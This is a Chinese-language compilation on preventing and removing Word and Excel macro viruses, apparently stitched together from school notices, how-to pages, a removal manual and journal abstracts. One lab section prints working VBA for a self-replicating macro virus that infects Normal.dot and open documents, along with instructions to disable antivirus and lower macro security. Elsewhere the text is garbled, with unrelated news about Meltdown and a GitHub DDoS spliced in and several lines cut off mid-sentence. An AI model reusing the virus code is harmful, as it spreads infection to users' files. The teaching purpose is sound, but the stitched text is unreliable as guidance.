Word文档宏病毒防范

关于Office文档中宏病毒的处理方法
Office文档是目前使用最多、最常见的办公文档(它包含Word文档，Excel文档，PPT文档等)，由于Office 软件默认的安全级别为中，所以Office文档成了病毒攻击的目标，目前有许多Office文档病毒，最近校园网出现的宏病毒传播，成了大家头疼的一件事，现就处理方法介绍如下，请各老师参考与分享。

1．宏病毒的分析
Office文档中的宏是Office中最高级别的部分，平时大家很少用到，它能把繁重的工作简单化，默认的安全级别为中，宏病毒正是利用这一点通过网络、U盘等进行传播，中毒的电脑明显反应变慢，Office文档大小在不断变化，有的成倍增加，一个小小的电子表格就有2M之多，使用十分困难。

2．感染后的特征
感染后的Office文档，除大小变大外，每次打开都要求启用宏，不启用便不能打开Office文档，或者打开了，全是空白，如果使用杀毒软件，则会把文档删除，给用户带来许多麻烦。

Office软件运行缓慢，电脑经常死机等。

由于现在（QQ、126）邮件系统都集成防毒软件，在发送邮件时上传感染后的Office文档，邮件系统会提示文件发送失败。

3．处理方法
方法一：
点击下载“Office病毒专杀.zip”工具，解压后安装，界面如下:
点击全盘杀毒，即可对电脑中的Office病毒进行全面查杀。

方法二：点击下载安装“新版360杀毒软件.rar”，启动新增Office宏病毒免疫功能。

关于宏病毒的判断、清除和预防关于宏病毒的判断、清除和预防2011年01月15日星期六下午01：09关于宏病毒的判断和预防前两天从EXCEL论坛里下载了一个帖子的附件(当然我认为该帖的发表人也不知道文件里有病毒)，没想里面有宏病毒"StartUp.xls"在打开文件时提示，缺少"StartUp.xls"。

因为论坛里有很多附件是包含宏的，为了使用时方便，因此我EXCEL中关于宏安全性设置的是"低"。

没想到造成了大错，在此提醒各位一定要将EXCEL中"工具→宏→安全性→安全级"设置为中，打开文件时要确认该文件是否包含宏。

对于宏病毒的判断：当安全级选为中时，如果一旦发现自己的不包含宏的文件打开时提示该文件包含宏，那么恭喜你已经中招了。

此时一定要注意所有打开的文件(指WORD、EXCEL文件)不要存盘，因为宏病毒只有存盘后才会被感染，如果需要将文件进行保存，建议存储为TXT格式，然后从新进行排版。

一定要将打开的文件作好备份再进行杀毒。

我从昨日中午发现机器里被感染病毒，先后使用了"esetsmartsecurity""瑞星天空网站版""360杀毒软件最新版"，但前两个软件均没有查出该病毒。

只有360查了出来并将病毒清除。

注意：在杀毒时不要选择"自动处理扫描出的病毒威胁"因为杀毒软件有可能会直接将文件删除，到时重要文件被删掉可是哭都来不及了，当其查出中毒文件后如是重要文件一定要将其重新存储为TXT格式，也可以使用XP自带的"写字板"(注意不是记事本)将word文件直接打开，并将内容保存下来，然后再交给杀毒软件处理。

这样就能保证文件内容不会丢失了。

excel宏病毒是怎么来的随着Internet在中国的迅速拓展,特别是中国教育和科研计算机网(CERNET)以及商业性的ChinaNet和COMNet的发展,电子邮件同样成为许多网络用户使用的工具,互联的校园网络在促进学校科研教育发展的同时,也非常容易成为网络攻击的对象,特别是在网络建设的初期,网络安全意识和网络防范能力都较为薄弱.据透露,一种新的致命病毒---Hare病毒定于近期"发作".Hare病毒届时将显示HDEuthanasia的信息,然后企图重写计算机硬盘上的全部文件.英国《病毒公报》编辑IanWhalley指出,Hare极为复杂,而且很难查出.它是借Internet传播的,未激活版本已在几个国家发现,其中包括美国.另外一种新病毒属于被称为"宏病毒"的传染病毒家族,宏病毒于一年前首次被发现.这种新病毒称为roux,是首例感染Microsoft公司Excell 电子表格的病毒.Laroux的表现很像目前常见的Word.concept病毒,后者在MicrosoftWord生成的文档中传播.Laroux可做为电子表格的附件进入电子邮件,或以其他同电子表格相同的传送方式传播.据美国全国计算机安全协会(NCSA)称,这种病毒相对来说没有什么危害,但可导致少数系统的"应用软件异常".NCSA指出,Laroux看上去比Word.concept传播的速度要慢,因为Excel不像Word使用那么广泛,而且用户不常共用电子表格,而文字处理器文档则经常共用.去年，用户经受的宏病毒猛增了5倍，安全专家把这主要归结为一个因素--电子邮件的迅速增加。

目前的DOS杀毒工具都不能很好的自动杀除宏病毒。

华美星际公司这次推出病毒克星for WORD比较圆满地解决了该问题。

如果说Concept 病毒引出了Word 宏病毒的概念，“台湾1号”便引来了Word 宏病毒的发作，引来了人们对Word 宏病毒的重视。

WORD宏病毒发现及清除：根据宏病毒的传染机制，不难看出宏病毒传染中的特点。

所以发现宏病毒可以通过以下步聚进行：1 在自己使用的WORD中打开工具中的宏菜单，点中通用（Normal）模板，若发现有“AutoOpen”等自动宏，“FileSave”等文件操作宏或一些怪名字的宏，而自己又没有加载特殊模板，这就有可能有病毒了。

因为大多数用户的通用（Normal）模板中是没有宏的。

2 如发现打开一个文档，它未经任何改动，立即就有存盘操作，也有可能是Word带有病毒。

3 打开以DOC为后缀的文件在另存菜单中只能以模板方式存盘而此时通用模板中含有宏，也有可能是Word有病毒。

手工清除宏病毒的方法：1 打开宏菜单，在通用模板中删除您认为是病毒的宏。

2 打开带有病毒宏的文档（模板），然后打开宏菜单，在通用模板和病毒文件名模板中删除您认为是病毒的宏。

3 保存清洁文档。

4 对剩余文件重复步骤1－3。

特别值得注意的是英文版Word模板中的病毒在英文版Word中或更高版本的中文版Word才能被发现并清除，反之中文版有相同规律。

用杀毒工具自动清除宏病毒是理想的解决办法。

方法1 用Word Basic 语言以Word 模板方式编制杀毒工具，在Word 环境中杀毒。

方法2 根据Word BFF格式，在Word环境外解剖病毒文档（模板），去掉病毒宏。

方法1因为在Word 环境中杀毒，所以杀毒准确，兼容性好。

而方法2由于各个版本的Word BFF格式都不完全兼容，每次Word 升级它也必须跟着升级，兼容性不好。

目前有些DOS杀毒软件不是采用Word BFF格式去解剖病毒文档（模板），而是简单化的把病毒文档（模板）中的某些特征串填为了零，病毒宏无法被去除，杀毒后的文件长度与带病毒时的长度相等，这种做法有三个缺点：其一：容易将原文档破坏。

OFFICE宏病毒查杀方案OFFICE宏病毒查杀方案彻底查杀本次OFFICE宏病毒，需通过以下步骤解决。

一、清除用户电脑上存在的病毒。

（4月16日11：30-13：00进行）二、安装或升级防毒软件，避免再次感染。

（4月16日11：30-13：00进行）具体说明如下：一、清除用户电脑上存在的病毒。

1、使用专杀工具“MacroKiller”进行杀毒。

图1MacroKiller专杀工具2、使用“Cleanmacro”office病毒专杀工具，进行杀毒。

图2“Cleanmacro”office病毒专杀第一文库网工具二、安装或升级防毒软件，避免再次感染。

1、安装ESETNOD32Antivirus4杀毒软件或者免费的360杀毒软件，注意2种杀毒软件不可以安装在同一台电脑。

2、建议已经安装ESETNOD32的用户先升级软件和病毒库，再进行查杀。

（具体操作如下图3、4、5）3、建议已经安装360的用户先升级软件和病毒，再进行查杀。

（具体操作如下图6、7、8、9）4、完成以上步骤以后，即可拥有对本次OFFICE宏病毒的防御能力。

5、培养良好的计算机使用习惯，防止病毒感染。

建议用户接收到文件后，先使用杀毒软件对文件进行查杀后再打开接收到的文件，尽量避免直接打开接收到的'文件，减少病毒感染的机率。

例1、通过OA打开文件时，建议先另存，再杀毒，然后再打开。

例2、通过RTX或其他即时通讯软件接收到的文件或程序，先另存再杀毒，然后再打开或运行；培养定期对电脑进行全盘杀毒的习惯，防止感染病毒。

图3ESETNOD32Antivirus4杀毒软件图4升级到4.2.71.2以上版本可以查杀本次OFFICE宏病毒图5ESETNOD32发现病毒后会自动隔离病毒文件，达到防御的目的。

如必须查看该文档请对方先通过专杀工具查杀后再发送。

图6360杀毒软件需升级到3.0.0.3031以上版本图7设置360杀毒软件的“实时防护设置”图8手动杀毒，鼠标单击右键选择相应的杀毒软件手动查杀病毒。

预防和清除宏病毒的方法摘要：宏是WORD中避免一再的重复相同的动作而设计出来的一种工具，宏病毒就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。

本文首先分析宏病毒的特性，并就如何检测、清除及预防进行了探讨。

关键词：宏病毒；WORD；预防；清除Abstract: The macro is a tool designed to avoid repeated the same action in the WORD, and a macro virus is the copy and infectious macro using the software to support macros written. This paper first analyzes the characteristics of macro virus, and discusses on how to detect, removal and prevent it.Key words: macro virus; WORD; prevention; clear所谓宏病毒，就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。

宏病毒是一种新形态的计算机病毒，也是一种跨平台式计算机病毒。

1.宏病毒的工作原理在用W O R D 处理文档时，需要同时进行各种不同的动作，每一种动作其实都对应着特定的宏命令。

宏病毒的感染过程和破坏行为与WORD 的文件宏程序的操作密切相关，这些宏程序可能就是宏病毒的插入点。

病毒包含在宏中时，只要染毒的文件被打开，病毒的宏程序就可能会被执行，进而取得系统控制权，进行感染和破坏。

为了能广泛地传播，宏病毒大都采用感染通用模版NORMAL.DOT 的方法将自己复制到其他文档中去。

W O R D启动时总是自动打开通用模版，这就为宏病毒在每次启动WORD 时能够取得系统控制权提供了机会。

含有自动宏的染毒文档，当被其他计算机的WORD 打开时，也会自动感染该计算机。

word出现宏病毒安全警告怎么办方法/步骤1、在word文档中用宏进行保护文件并不复杂。

在菜单栏的上面找到工具选项，并找到在下拉菜单底部位置的宏选项。

2、单击第三个选项中的宏安全性，打开宏设置界面，进行宏相关设置的编辑。

3、这样就完成了宏安全性的查看。

但是不是要说宏如何加密吗?下面就来讲解宏怎样加密文档。

4、返回刚才的菜单中，找到宏选项，并且单击进入宏指令编辑模式。

5、在下拉选框中输入宏的名称，在宏的位置找到所有的活动文档，并且选择创建，就可以完成宏的创建。

但是这还没完，还要编辑宏。

6、在打开的代码编辑界面中，在end sub的上面插入索要加密的指令代码，让宏在word运行时执行这些代码，起到保护作用。

7、在网上可以找到一些可用的加密代码，因为比较复杂这里就不做说明。

英文点号可以起到快捷输入的作用。

在end sub之后写代码是没有用处的。

8、输入完成后，在左上角找到保存normal菜单项，就可以对word文档进行加密啦!9、千万不要忘记密码，也就是代码快结束时Password = xxxx部分，这非常重要哦!10、加密完成的效果就是这样。

是不是很有效果并且很有成就感呢?相关阅读：1月，英特尔处理器中曝Meltdown(熔断)和Spectre (幽灵)两大新型漏洞，包括AMD、ARM、英特尔系统和处理器在内，几乎近发售的所有设备都受到影响，受影响的设备包括手机、电脑、服务器以及云计算产品。

这些漏洞允许恶意程序从其它程序的内存空间中窃取信息，这意味着包括密码、帐户信息、加密密钥乃至其它一切在理论上可存储于内存中的信息均可能因此外泄。

二、GitHub 遭遇大规模Memcached DDoS 攻击2月，知名代码托管网站GitHub 遭遇史上大规模Memcached DDoS 攻击，流量峰值高达1.35 Tbps。

然而，事情才过去五天，DDoS攻击再次刷新纪录，美国一家服务提供商遭遇DDoS 攻击的峰值创新高，达到1.7 Tbps!攻击者利用暴露在网上的Memcached 服务器进行攻击。

一、宏病毒是什么？宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

二、宏病毒的判断方法虽然不是所有包含宏的文档都包含了宏病毒，但当有下列情况之一时，您可以百分之百地断定您的OFFICE文档或OFFICE系统中有宏病毒：1、在打开“宏病毒防护功能”的情况下，当您打开一个您自己写的文档时，系统会会弹出相应的警告框。

而您清楚您并没有在其中使用宏或并不知道宏到底怎么用，那么您可以完全肯定您的文档已经感染了宏病毒。

2、同样是在打开“宏病毒防护功能”的情况下，您的OFFICE文档中一系列的文件都在打开时给出宏警告。

由于在一般情况下我们很少使用到宏，所以当您看到成串的文档有宏警告时，可以肯定这些文档中有宏病毒。

3、如果软件中关于宏病毒防护选项启用后，不能在下次开机时依然保存。

WORD中提供了对宏病毒的防护功能，它可以在“工具/选项/常规”中进行设定。

但有些宏病毒为了对付OFFICE中提供的宏警告功能，它在感染系统（这通常只有在您关闭了宏病毒防护选项或者出现宏警告后您不留神选取了“启用宏”才有可能）后，会在您每次退出OFFICE时自动屏蔽掉宏病毒防护选项。

因此您一旦发现:您的机器中设置的宏病毒防护功能选项无法在两次启动WORD之间保持有效，则您的系统一定已经感染了宏病毒。

也就是说一系列WORD 模板、特别是normal.dot 已经被感染。

鉴于绝大多数人都不需要或着不会使用“宏”这个功能，我们可以得出一个相当重要的结论：如果您的OFFICE文档在打开时，系统给出一个宏病毒警告框，那么您应该对这个文档保持高度警惕，它已被感染的几率极大。

注意：简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒！三、宏病毒的防治和清除首选方法：用最新版的反病毒软件清除宏病毒。

一、word选项——加载项——管理【com加载项】，转到——把几个勾勾都取消掉——确定。

二、Office按钮→ Word选项→信任中心…信任中心设置‟→宏设置…宏设置‟下点选…禁用所有宏，并且不通知‟。

三、选择控制面板中的添加删除程序，选中office2007选择添加或删除功能，在对“office共享功能”的选择项里面，其中有两个选项，一个是“VBA项目的数字证书”，另一个是“viral basic for applications”，可能是在自定义安装时没有安装这两个模块，或者只选择安装了其中一个。

知道了这个情况后，重新选择并安装上这两个组件即可。

四、进入“工具|宏”，查看模板Normal.dot，若发现有Filesave、Filesaveas等文件操作宏或类似AAAZAO、AAAZFS
明的宏。

对以Auto×××命名的，若不是用户自己命名的自
创建的自动宏，可以打开它，看是否与原来创建时的内容一
改这时应该将自动宏修改为原来编制的内容。

在最糟的情况
路不明的宏，甚至是用户自己创建的宏。

因为即便删错了，也不会对Word文档内容产生任何影响，仅仅是少了“宏功能”。

如果需要，还可以重新编制。

入“文件|新建”，选择“模板”，正常情况下，可以在“文件模板”处见到“Normal.dot”，如果没有，说明文档模板文件Normal.dot已被病毒修改了。

这时用你手边原来备份
删掉然毒Normal.dot，重新进入Word，在“模板”里，重置默认字体等选项后退出Word，系统就会自动创建一个干净的Normal.dot。

再进入Word，再打开原来的文本，并新建。

宏病毒清除操作手册摘要：宏病毒是一种常见的计算机病毒，它利用办公软件中的宏功能进行传播和感染。

本文档旨在为用户提供一份清除宏病毒的操作手册，包含如何识别宏病毒、清除感染文件以及预防宏病毒传播的方法等。

通过遵循本手册中的操作指引，用户可以及时有效地清除宏病毒，提高计算机系统的安全性和稳定性。

1. 简介宏病毒是一种利用办公软件（如Microsoft Office）中的宏功能进行传播和感染的计算机病毒。

它通常存在于Office文档（如Word 文档、Excel文件等）中，并且可以通过下载、打开或共享这些文件来传播。

一旦感染，宏病毒可能对计算机系统和文件造成损害，甚至可能导致数据丢失和系统崩溃。

2. 识别宏病毒在清除宏病毒之前，首先需要能够准确识别它们。

以下是一些常见的识别方法：a. 注意文件扩展名：宏病毒通常会将文件扩展名更改为“.docm”、“.xlsm”等，以启用宏功能。

b. 观察异常行为：如果文档在打开后自动执行某些操作或显示不寻常的行为，很可能是宏病毒的迹象。

c. 启用安全模式：通过将办公软件启动到安全模式，可以禁用宏并防止其执行。

3. 清除宏病毒一旦确定文件被宏病毒感染，请按照以下步骤清除它：a. 先暂时关闭宏：打开Office软件，前往“选项”>“信任中心”>“信任中心设置”，在“宏设置”中选择“禁用所有宏”选项。

b. 打开感染文件：用Office软件打开感染文件，进入“开发人员”选项卡，点击“宏”按钮。

c. 删除宏代码：在弹出的“宏”窗口中，选中所有宏代码，点击“删除”按钮，然后关闭文件并不保存修改。

d. 执行杀毒扫描：使用可靠的杀毒软件对计算机进行全面扫描以确保宏病毒已清除。

4. 防止宏病毒传播除了及时清除感染文件外，预防宏病毒的传播也是非常重要的。

下面是一些建议：a. 更新办公软件：始终确保您使用的办公软件是最新版本，并及时安装官方提供的安全补丁和更新。

b. 禁用宏功能：如果您在日常工作中不需要使用宏功能，可以将其禁用，从根本上减少宏病毒的风险。

Word：文档自我防卫妙招5那么Word：文档自我防卫妙招5那么文档也有平安性问题，尤其关于office文档，为了让您的文档更平安，office提供了比较完善的平安和文档爱惜功能，它包括：平安级别、数字签名、密码设置、窗体爱惜和批注口令。

文档的平安级别对word文档最大的平安隐患确实是宏病毒，为了避免宏病毒word设立了平安级别的概念。

您可在“工具→选项→“平安性”选项卡→宏平安性”的“平安级”选项卡中进行设置，平安级别共分为高、中、低三挡。

高级别将只运行靠得住来源的宏，其它宏一概取消；中级别在打开一个宏时，您会看到一条警告，让您选择是不是启用；低级别就不进行宏的爱惜。

被选择高级别时，已安装的模板和加载项(包括向导)中的宏可能会被禁用。

您只有在“工具→选项→平安性→宏平安性”中单击“靠得住来源”选项卡，然后点击“信任所有安装的加载项和模板”复选框，才能让安装的宏不被禁用。

注意：所有随microsoft office xp的模板、加载项和宏都通过了microsoft数字签名。

一旦针对这些已安装文件中的一个安装添加到了您的靠得住来源列表中，随后与这些文件的交互操作将再也不生成消息。

数字证书的爱惜很多文档的来源都是不详的，因此平安性无法保证。

office能够通过数字证书来确认来源的靠得住。

并通过数字证书对文件或宏进行数字签名。

一样来讲，数字证书是从商业证书颁发机构和内部平安治理员或信息技术专业人员处取得的。

一般用户能够利用selfcert.exe工具亲自创建数字签名(由于用selfcert.exe自己创建的数字证书不是由正式证书颁发机构发行的，利用这种证书添加签名的宏方案将被以为是自签名的方案，如此其他用户有可能无法运行自签名的宏)。

用数字证书进行宏的签名很简单：打开包括要签名的宏方案的文件，在“工具→宏→visual basic编辑器→工程资源治理器”中，选择要签名的方案。

再点击“工具→数字签名”命令。

教你管理Office Word“宏病毒” 电脑资料现在很多朋友在写作文档时喜欢到网上下载各种模板简化自己的工作，教你管理Office Word“宏病毒” 。

不过网络模板中有一些“害群之马”可不是为方便大家而产生的，它们携带着宏病毒。

宏病毒寄生在模板或者文档中，当大家运行文档或者模板后就会激活病毒从而危害电脑。

不过也不用过分担忧，我们用下面的方法就可以让宏病毒永远远离我们的电脑。

验证：通过保存类型，巧妙鉴别宏病毒如何检查Word是否感染了宏病毒？其实检查的方法很简单。

翻开需要检查的文档，单击“文件”菜单栏，选择“另存为”命令，如果对话框中的保存类型固定为“文档模板”，那么表示这个文件已经感染了宏病毒，需要用杀毒软件进行清理了。

小提示：当然，你直接用杀毒软件来扫描一下这个文档也未尝不可，毕竟现在不装杀毒软件的用户还是少数啊。

拒绝：设置文档为“只读”属性，让病毒吃闭门羹因为宏病毒在word中寄居的文件就是no rmal.dot，所以预防宏病毒的方法其实也很简单，只要把没有感染宏病毒的normal.dot文件的属性设置为只读，这样宏病毒就不能寄居到normal.dot中，就能起到预防宏病毒的效果了，电脑资料《教你管理office word“宏病毒”》( s:// )。

小提示：虽然把一些内容固定的文件设置为具有只读属性，是防止病毒侵入的方法之一，但这也不是万能的，如果病毒制造者注意到这一点，在侵入前先修改你的文件属性，去掉只读属性，那对他们来说也是小菜一碟。

查杀：查杀，统统赶走宏病毒宏病毒是通过Word中的宏语言（一种类似VB的语言）编写的，易于传播而且危害巨大，常常能将你花了很多时编写的文档瞬间“吃掉”，下面介绍使用手工的方法杀掉宏病毒。

单击“工具”菜单栏，选择“宏”，单击“宏”命令（或者使用组合键“Alt＋F8”）调出宏对话框，如果在弹出的对话框中有已经记录的宏的话，那就极有可能是宏病毒，删除所有的宏就可以了。

Office办公软件中的宏与宏病毒Office办公软件中的宏与宏病毒在实际的社会生活中，人们在运用电脑享受到快捷方便的同时，也担心电脑病毒的干扰。

如何预防、清除宏病毒?下面是YJBYS店铺为大家搜索整理的几种方法，欢迎参考阅读，希望对大家有所帮助!想了解更多相关信息请持续关注我们应届毕业生培训网!现在所有企业用的最多的办公软件就是Office，它包含的范围非常广泛，做表格可以用Excel，打材料报告或文章可以用Word，如果数据比较多那就用Access数据库，如果开会或演示的话就可以用到PowerPoint，这些软件大大方便了人们的生活和使用。

但是随着计算机的大量使用，很多病毒都会乘虚而入。

宏病毒就是其中一种。

一、宏病毒的定义宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

所谓“宏”可以理解为一些命令的集合，类似于DOS下的批处理文件，它能给文件的编辑带来许多方便。

宏病毒编制极其容易，微软的宏语言都是BASIC语言的子集。

宏病毒利用宏语言外部的例程的调用能力如使用Windows API函数，能进行任何操作。

一句话只要有应用程序支持解释，宏病毒无需改动即可在许多平台上运行。

二、宏病毒的分析Office文档中的宏是Office中最高级别的部分，平时大家很少用到，它能把繁重的工作简单化，其在电脑中默认的安全级别为中，宏病毒正是利用这一点通过网络、u盘等进行传播，中毒的电脑明显反应变慢，Office文档大小在不断变化，有的成倍增加，一个小小的电子表格就有2M之多，对于操作者使用十分困难。

三、宏病毒感染后的特征“宏病毒”能在文件间复制自身的恶意宏程序，一般可以损坏或更改数据。

一旦打开沾染病毒的文档，其中的宏就会被执行，宏病毒会被激活，转移到计算机上，并驻留在Normal模板上。

此后，所有自动保存的文档都会“感染”上这种宏病毒，感染后的Office文档，除大小变大外，每次打开都要求启用宏，不启用便不能打开Office文档，或者打开了，全是空白，如果使用杀毒软件，则会把文档删除，造成文件丢失，给用户带来许多麻烦。

Word宏病毒实验1. 实验目的Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。

本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。

2. 实验所需条件和环境硬件设备:局域网，终端PC机。

系统软件:Windows系列操作系统支撑软件:Word 2003软件设置:关闭杀毒软;打开Word 2003，在工具,宏,安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问实验环境配置如下图所示:受感染Word文档受感染终端被感染终端宏病毒传播示意图3. 实验内容和分析为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦(对每个打开过的文档都要清除)。

3.1. 例1 自我复制，感染word公用模板和当前文档代码如下:'Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = False Options.SaveNormalPrompt =False Ourcode =ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate ThenSet Host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith HostIf .Lines(1.1) <> "'Micro-Virus" Then.DeleteLines 1, .CountOfLines.InsertLines 1, Ourcode.ReplaceLine 2, "Sub Document_Close()"If ThisDocument = nomaltemplate Then.ReplaceLine 2, "Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithMsgBox "MicroVirus by Content Security Lab" End Sub打开一个word文档，然后按Alt+F11调用宏编写窗口(工具,宏,Visual Basic,宏编辑器),在左侧的project—>Microsoft Word对象,ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中，同时改变函数名(模板中为Document_Close，当前文档为Document_Open)，此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。

三招防范宏病毒由于宏病毒经常在办公软件Office中出现，给广大用户造成不小的损失。

笔者发现，通过以下三招可以远离宏病毒（以Word为例）。

第一招：设置宏安全级别打开Word，选择“工具选项安全性宏安全性”命令，这样就打开了宏的安全级别属性设置选项，将安全级别由默认的“高”修改为“非常高”，最后单击“确定”即可。

这样可以防止除Word默认的宏以外的其他宏运行。

第二招：运行宏病毒自动提示打开Word，选择“工具选项安全性宏安全性”命令，单击“可靠发行商”标签，取消选择“信任所有安装的加载项和模板”复选框，然后单击“确定”即可。

这样当打开含有宏的Word文档时，就会提示宏已被禁止。

当然，也可能让正常的宏使用受到限制。

第三招：卸载VBA彻底预防宏病毒VBA全称是Visual Basic for Application，它是Microsoft Visual Basic的宏语言版本。

用于Windows应用程序的宏。

是Word中宏的支持工具包，一旦禁用此包，一些自定义模板和所有的宏将不可用。

具体方法：双击“控制面板”中的“添加/删除程序”图标，找到Microsoft Office的安装项，单击“更改”按钮，选择“添加或删除功能”选项后，单击“下一步”按钮，在弹出来的窗口选“选择应用程序的高级自定义”复选框，再单击“下一步”按钮，这样，就可以选择删除该工具包。

在打开的Office程序及附加内容和工具中单击“Office共享功能“前的加号，找到“Visual Basic for Application”，单击前面的驱动器图标，选择“不安装”按钮即可。

经过以上三招，宏病毒将会远离你的Office了，这里是以Word为例介绍的，其实对Excel 也同样适用，不妨一试。

、只要运行注册表就可以啦！具体做法：在“开始”里找到“运行”按纽，点击后在“打开”栏里输入“regedit”，就可以打开注册表了；找到HKEY_LOCAL_MACHINE打开,找SOFTWARE打开,找Microsoft打开,找office 打开,找11.0打开,找EXCEL打开,找security打开后看到它旁边的窗口有一项名称为LEVEL 的，双击它，在跳出的编辑DWORD值里面看到数值数据（V）：下面的空格啦，你就可以在里面修改数值啦。

Office宏病毒防范操作说明宏病毒是一种寄存在文档或模板的宏中的普通病毒。

现个别电脑的Office文档已被感染了宏病毒，可能因启用Office的宏，或对宏安全性设置为“低”，从而导致Office容易感染宏病毒，或者访问过被感染宏病毒的文档也容易传播感染，为了防止宏病毒,建议禁用宏,这样就不会被感染。

如财务部某些报表需启用宏才可访问，处理完毕该报表后请对宏更改安全性设置为:“高”或“非常高”，以禁用宏命令，否则以后会容易感染宏病毒。

请大家参照以下步骤对宏安全性进行设置：1、打开Office2003的Excel报表，选择“工具”→“选项”，然后选择“安全性”，请选择上“√保存时从文件属性中删除个人信息”。

并单击“安全性”对话框中单击“高”按钮将安全级别设为高。

（以图红色部分）2、打开Office2007/2010的Excel报表，单击Office按钮→右下角“Word选项”→信用中心→信任中心设置→宏设置→禁用所有宏，并发出通知。

（以图红色部分）3、以上操作对宏禁用后可能导致某些报表无法打开，或者出现其它提示，可能该报表已被宏病毒损坏。

请对宏启用并打开此表，选择复制或（Ctrl+A）此表中全部内容，重新创建新Excel表并粘贴或（Ctrl+V），方可解决，如未能解决，请联系分机8303，需重新安装Office办公软件。

4、杀毒软件（最新版360、卡巴、金山等）都可以查杀，邮件附件中有Office 宏病毒专杀工具，请直接打开安装并全盘查杀，查杀完毕后请从“控制面板”中卸载“Office宏病毒专杀”。

5、为了共享平台上报表安全，平台上已查杀过病毒，但可能某此报表已被宏损坏难以修复，请各部门的负责员进行对自己负责的报表检查，如出现被宏损坏的报表请打开并复制重新创建报表并禁用宏。

请对加密报解密后进行查杀病毒（加密报表无法杀毒）。

基于Word宏病毒的识别及防治方法
王鑫
【期刊名称】《电脑与信息技术》
【年(卷),期】2004(012)002
【摘要】在广泛使用Word的同时,Word宏病毒也利用其文档机制进行传播.文章从宏病毒的特点、性质、作用机制等方面进行了分析;在此基础上结合宏病毒的结构特点,介绍了Word宏病毒的识别、预防和清除等技术,给Word用户提供了一种简单实用且效果明显的方法.
【总页数】4页(P62-65)
【作者】王鑫
【作者单位】潍坊学院公共计算机部,山东,潍坊,261061
【正文语种】中文
【中图分类】TP309.5
【相关文献】
1.Word宏病毒简析 [J], 王素芳
2.Word97高级应用Word97的宏编程及宏病毒 [J], 李珊珊
3.Word宏病毒综合防治方法 [J], 董晓峰
4.基于Microsoft Word 97/2000的宏病毒剖析 [J], 李柳柏
5.浅析Word文档宏病毒的识别及防治办法 [J], 王俊峰
因版权原因，仅展示原文概要，查看原文内容请购买。

Word宏病毒的预防和清除
陈晓辉
【期刊名称】《电脑》
【年(卷),期】1997(000)005
【摘要】所谓Word宏病毒,即指台湾1号(TaiWan No.1 Macro病毒)和上海1号(Shanghai No.1Macro病毒).台湾1号每月13号发作,上海1号每年季度末月的13号发作.宏病毒与以往的计算机病毒不同,它只感染微软Word图文文件＊.doc和模板文件＊.dot,是一种专向病毒.宏病毒发作的症状是:在Word编辑状态调入已有文件时,屏幕上弹出一个 Windows对话小窗口,其标题是“No.1 Macro Virus”,下面是五个4～5正整数的连乘算式,若连续两次输入的结果不对或不输入,则陷入死机状态,若输入的所有结果正确,则又出一题,没完没了.宏病毒由台湾传入,经“升级”后,有一种症状较为引人注意,就是病毒发作了,将整个硬盘重新分区,并填以随机数据,后果非常严重.
【总页数】1页(P54)
【作者】陈晓辉
【作者单位】中国科技大学
【正文语种】中文
【中图分类】TP309
【相关文献】
1.Word宏病毒的预防及清除 [J], 刘晓静
2.Word宏病毒的预防和清除 [J],
3.Word宏病毒的预防与清除 [J], 张秀芝
4.Word宏病毒的预防和清除 [J], 陈晓辉
5.Word宏病毒的预防及清除 [J], 刘晓静
因版权原因，仅展示原文概要，查看原文内容请购买。